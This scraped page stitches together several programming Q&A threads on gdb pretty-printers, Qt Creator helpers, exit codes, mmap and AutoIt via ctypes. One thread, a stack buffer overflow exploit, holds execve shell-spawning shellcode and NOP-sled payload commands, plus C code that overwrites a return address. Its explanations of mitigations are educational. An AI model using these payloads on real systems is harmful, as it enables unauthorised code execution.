How do I apply the printers.py modification? (Linux OS)

How do I apply the printers.py modification? (Linux OS) - python

I checked the core file because the process(c++ lang) running on Linux died, and the contents of the core file
[Corefile]
File "/usr/lib64/../share/gdb/python/libstdcxx/v6/printers.py", line 558, in to_string
return self.val['_M_dataplus']['_M_p'].lazy_string (length = len)
RuntimeError: Cannot access memory at address 0x3b444e45203b290f
I think that there was a problem with class StdStringPrinter at printers.py.
So I looked up a text that explained the problem I was looking for on this site , modified printers.py, and created a .gdbinit on my home path and wrote the content.
How to enable gdb pretty printing for C++ STL objects in Eclipse CDT?
Eclipse/CDT Pretty Print Errors
But this method is a little different from the one I'm looking for because it's done in Eclipse.
my gdb version is 7.6.1-94.el7
[printer.py]
class StdStringPrinter:
"Print a std::basic_string of some kind"
def __init__(self, typename, val):
self.val = val
def to_string(self):
# Make sure &string works, too.
type = self.val.type
if type.code == gdb.TYPE_CODE_REF:
type = type.target ()
sys.stdout.write("HelloWorld") // TEST Code
# Calculate the length of the string so that to_string returns
# the string according to length, not according to first null
# encountered.
ptr = self.val ['_M_dataplus']['_M_p']
realtype = type.unqualified ().strip_typedefs ()
reptype = gdb.lookup_type (str (realtype) + '::_Rep').pointer ()
header = ptr.cast(reptype) - 1
len = header.dereference ()['_M_length']
if hasattr(ptr, "lazy_string"):
return ptr.lazy_string (length = len)
return ptr.string (length = len)
def display_hint (self):
return 'string'
[.gdbinit]
python
import sys
sys.path.insert(0, '/home/Hello/gcc-4.8.2/python')
from libstdcxx.v6.printers import register_libstdcxx_printers
register_libstdcxx_printers (None)
end
My question is to modify printers.py, write gdbinit, and then re-compile the process to test whether it has been applied as modified.
How can I print my modified TEST code at Linux Terminal?

I think that there was a problem with class StdStringPrinter at printers.py
I think you are fundamentally confused, and your problem has nothing at all to do with printers.py.
You didn't show us your GDB session, but it appears that you have tried to print some variable of type std::string, and when you did so, GDB produced this error:
RuntimeError: Cannot access memory at address 0x3b444e45203b290f
What this error means is that GDB could not read value from memory location 0x3b444e45203b290f. On an x86_64 system, such a location indeed can not be readable, because that address does not have canonical form.
Conclusion: the pointer that you followed (likely a pointer to std::string in your program) does not actually point to std::string. "Fixing" the printers.py is not going to solve that problem.
This conclusion is corroborated by
the process(c++ lang) running on Linux died,
Finally, the pointer that you gave GDB to print: 0x3b444e45203b290f looks suspiciously like an ASCII string. Decoding it, we have: \xf); END;. So it's very likely that your program scribbled ); END; over a location where the pointer was supposed to be, and that you have a buffer overflow of some sort.
P.S.
My question is to modify printers.py, write gdbinit, and then re-compile the process to test whether it has been applied as modified.
This question also shows fundamental misunderstanding of how printers.py works. It has nothing to do with your program (it's loaded into GDB).
Recompiling anything (either your program or GDB) is not required. Simply restarting GDB should be all that's neccessary for it to pick up the new version of printers.py (not that that would fix anything).

Related

How to write a custom debugging helper for nlohmann::basic_json?

I am faced with the task of writing a simple debug helper for Qt Creator 4.13.1 / Qt 5.12.5 / MSVC 2017 compiler for the C++ JSON implementation nlohmann::basic_json (https://github.com/nlohmann/json).
An object of nlohmann::basic_json can contain the contents of a single JSON data type (null, boolean, number, string, array, object) at a time.
There's a dump() member function which can be used to output the current content formatted as a std::string regardless of the current data type. I always want to use this function.
What I've done so far:
I've looked at https://doc.qt.io/qtcreator/creator-debugging-helpers.html, as well as at the given example files (qttypes.py, stdtypes.py...).
I made a copy of the file personaltypes.py and told Qt Creator about its existence at
Tools / Options / Debugger / Locals & Expressions / Extra Debugging Helpers
The following code works and displays a "Hello World" in the debugger window for nlohmann::basic_json objects.
import dumper
def qdump__nlohmann__basic_json(d, value):
d.putNumChild(0)
d.putValue("Hello World")
Unfortunately, despite the documentation, I have no idea how to proceed from here on.
I still have absolutely no clue how to correctly call basic_json's dump() function with the dumper from Python (e.g. with d.putCallItem ?).
I also have no starting point how to format the returned std::string so that it is finally displayed in the debugger window.
I imagined something like this, but it doesn't work.
d.putValue("data")
d.putNumChild(1)
d.putCallItem('dump', '#std::string', value, 'dump')
I hope someone can give me a little clue so that I can continue thinking in the right direction.
For example, can I call qdump__std__string from stdtypes.py myself to interpret the std::string?

Get Python to read a return code from C# in a reliable fashion

I've written a large-ish program in Python, which I need to talk to a smaller C# script. (I realise that getting Python and C# to talk to each other is not an ideal state of affairs, but I'm forced to do this by a piece of hardware, which demands a C# script.) What I want to achieve in particular - the motivation behind this question - is that I want to know when a specific caught exception occurs in the C# script.
I've been trying to achieve the above by getting my Python program to look at the C# script's return code. The problem I've been having is that, if I tell C# to give a return code x, my OS will receive a return code y and Python will receive a return code z. While a given x always seems to correspond to a specific y and a specific z, I'm having difficulty deciphering the relationship between the three; they should be the same.
Here are the specifics of my setup:
My version of Python is Python 3.
My OS is Ubuntu 20.04.
I'm using Mono to compile and run my C# script.
And here's a minimal working example of the sort of thing I'm talking about:
This is a tiny C# script:
namespace ConsoleApplication1
{
class Script
{
const int ramanujansNumber = 1729;
bool Run()
{
return false;
}
static int Main(string[] args)
{
Script program = new Script();
if(program.Run()) return 0;
else return ramanujansNumber;
}
}
}
If I compile this using mcs Script.cs, run it using mono Script.exe and then run echo $?, it prints 193. If, on the other hand, I run this Python script:
import os
result = os.system("mono Script.exe")
print(result)
it prints 49408. What is the relationship between these three numbers: 1729, 193, 49408? Can I predict the return code that Python will receive if I know what the C# script will return?
Note: I've tried using Environment.Exit(code) in the C# script instead of having Main return an integer. I ran into exactly the same problem.

With os.system the documentation explicitly states that the result is in the same format as for the os.wait, i.e.:
a 16-bit number, whose low byte is the signal number that killed the process, and whose high byte is the exit status (if the signal number is zero); the high bit of the low byte is set if a core file was produced.
So in your case it looks like:
>>> 193<<8
49408
You might want to change that part to using subprocess, e.g. as in the answer to this question
UPD: As for the mono return code, it looks like only the lower byte of it is used (i.e. it is expected to be between 0 and 255). At least:
>>> 1729 & 255
193

Why is my stack buffer overflow exploit not working?

So I have a really simple stackoverflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?
UPDATE
Nevermind ya'll, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All Im doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack be turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.

There are several protections, for the attack straight from the
compiler. For example your stack may not be executable.
readelf -l <filename>
if your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).
Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.
if your are trying this on your own program consider removing some of the protections with gcc commands:
gcc -z execstack
Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that should be placed inside the instruction pointer
you can modify the last hex digits to point somewhere inside your nops and not
necessarily at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.

This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for all environment variables and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. envcount) and creates an char *envp[envcount + 1] on the stack and fills in the envp values with pointers to the given strings. It null terminates this envp
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On an x86, the argc, argv, and envp pointer values are put into the first three argument registers of the x86 ABI.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}

I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
And called it at the end of main right before Return to get an idea where the stack was. From there I just played with that value subtracting 4 from the printed ESP until it worked.

Python, why does mmap.move() fill up the memory?

edit: Using Win10 and python 3.5
I have a function that uses mmap to remove bytes from a file at a certain offset:
def delete_bytes(fobj, offset, size):
fobj.seek(0, 2)
filesize = fobj.tell()
move_size = filesize - offset - size
fobj.flush()
file_map = mmap.mmap(fobj.fileno(), filesize)
file_map.move(offset, offset + size, move_size)
file_map.close()
fobj.truncate(filesize - size)
fobj.flush()
It works super fast, but when I run it on a large number of files, the memory quickly fills up and my system becomes unresponsive.
After some experimenting, I found that the move() method was the culprit here, and in particular the amount of data being moved (move_size).
The amount of memory being used is equivalent to the total amount of data being moved by mmap.move().
If I have 100 files with each ~30 MB moved, the memory gets filled with ~3GB.
Why isn't the moved data released from memory?
Things I tried that had no effect:
calling gc.collect() at the end of the function.
rewriting the function to move in small chunks.

This seems like it should work. I did find one suspicious bit in the mmapmodule.c source code, #ifdef MS_WINDOWS. Specifically, after all the setup to parse arguments, the code then does this:
if (fileno != -1 && fileno != 0) {
/* Ensure that fileno is within the CRT's valid range */
if (_PyVerify_fd(fileno) == 0) {
PyErr_SetFromErrno(PyExc_OSError);
return NULL;
}
fh = (HANDLE)_get_osfhandle(fileno);
if (fh==(HANDLE)-1) {
PyErr_SetFromErrno(PyExc_OSError);
return NULL;
}
/* Win9x appears to need us seeked to zero */
lseek(fileno, 0, SEEK_SET);
}
which moves your underlying file object's offset from "end of file" to "start of file" and then leaves it there. That seems like it should not break anything, but it might be worth doing your own seek-to-start-of-file just before calling mmap.mmap to map the file.
(Everything below is wrong, but left in since there are comments on it.)
In general, after using mmap(), you must use munmap() to undo the mapping. Simply closing the file descriptor has no effect. The Linux documentation calls this out explicitly:
munmap()
The munmap() system call deletes the mappings for the specified address range, and causes further references to addresses within the range to generate invalid memory references. The region is also automatically unmapped when the process is terminated. On the other hand, closing the file descriptor does not unmap the region.
(The BSD documentation is similar. Windows may behave differently from Unix-like systems here, but what you are seeing suggests that they work the same way.)
Unfortunately, Python's mmap module does not bind the munmap system call (nor mprotect), at least as of both 2.7.11 and 3.4.4. As a workaround you can use the ctypes module. See this question for an example (it calls reboot but the same technique works for all C library functions). Or, for a somewhat nicer method, you can write wrappers in cython.

Call functions in AutoIt DLL using Python ctypes

I want to call functions from an AutoIt dll, that I found at C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dll using Python. I know I could use win32com.client.Dispatch("AutoItX3.Control") but I can't install the application or register anything in the system.
So far, this is where I am:
from ctypes import *
path = r"C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.dll"
autoit = windll.LoadLibrary(path)
Here are the methods that works:
autoit.AU3_WinMinimizeAll() # windows were successfully minimized.
autoit.AU3_Sleep(1000) # sleeps 1 sec.
Here is my problem, python is crashing when I call other methods like this one. I get python.exe has stopped working from windows...
autoit.AU3_WinGetHandle('Untitled - Notepad', '')
And some other methods are not crashing python but are just not working. This one doesn't close the window and return 0:
autoit.AU3_WinClose('Untitled - Notepad', '')
And this other one return 1 but the window is still minimized:
autoit.AU3_WinActivate('Untitled - Notepad', '')
I've tested the examples with with Dispatch("AutoItX3.Control") and everything is working like expected.
It seems like methods that should return something other than a string are crashing python. But still, others like WinClose are not even working...
Thank you in advance for your help!
EDIT:
These methods are now working when using unicode strings:
autoit.AU3_WinClose(u'Untitled - Notepad', u'')
autoit.AU3_WinActivate(u'Untitled - Notepad', u'')
And I found the prototype for AU3_WinGetHandle:
AU3_API void WINAPI AU3_WinGetHandle(const char szTitle,
/[in,defaultvalue("")]*/const char *szText, char *szRetText, int
nBufSize);
Now I can retrieve the return value using the following code!
from ctypes.wintypes import LPCWSTR
s = LPCWSTR(u'')
print AU3_WinGetHandle(u'Untitled - Notepad', u'', s, 100) # prints 1
print s.value # prints '000705E0'!
Thank you to those who helped me!

If you have the prototypes of the functions you're trying to call, then we can help you debug the calls without guessing. Or, more importantly, we won't have to help you debug the calls, because you can let ctypes do it for you.
See Specifying the required argument types in the docs.
For example, let's say the function looks like this (just a random guess!):
void AU3_WinClose(LPCWSTR name, LPCWSTR someotherthing);
You can do this:
autoit.AU3_WinClose.argtypes = (LPCWSTR, LPCWSTR)
autoit.AU3_WinClose.restype = None
If you do this, ctypes will try to convert your arguments to the specified types (LPWSTR, which is a pointer to wide char used for Windows UTF-16 strings) if it can, or raise an exception if it can't, and will not expect any return value.
If you don't do this, ctypes will try to guess the right things to convert your arguments to, possibly guessing wrong, and will try to interpret the non-existent return value as an int. So, it will usually crash until you managed to guess exactly what types to throw at it to make it guess the right types to pass to the function.

Will it work with unicode strings?
autoit.AU3_WinClose(u'Untitled - Notepad', u'')
autoit.AU3_WinActivate(u'Untitled - Notepad', u'')
Actually you might have to explicitly create unicode buffers, e.g.:
autoit.AU3_WinClose(create_unicode_buffer('Untitled - Notepad'), create_unicode_buffer(''))
Via some Googling, it looks like AU3_WinGetHandle takes 4 arguments, not 2. So you need to get that sorted out.

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.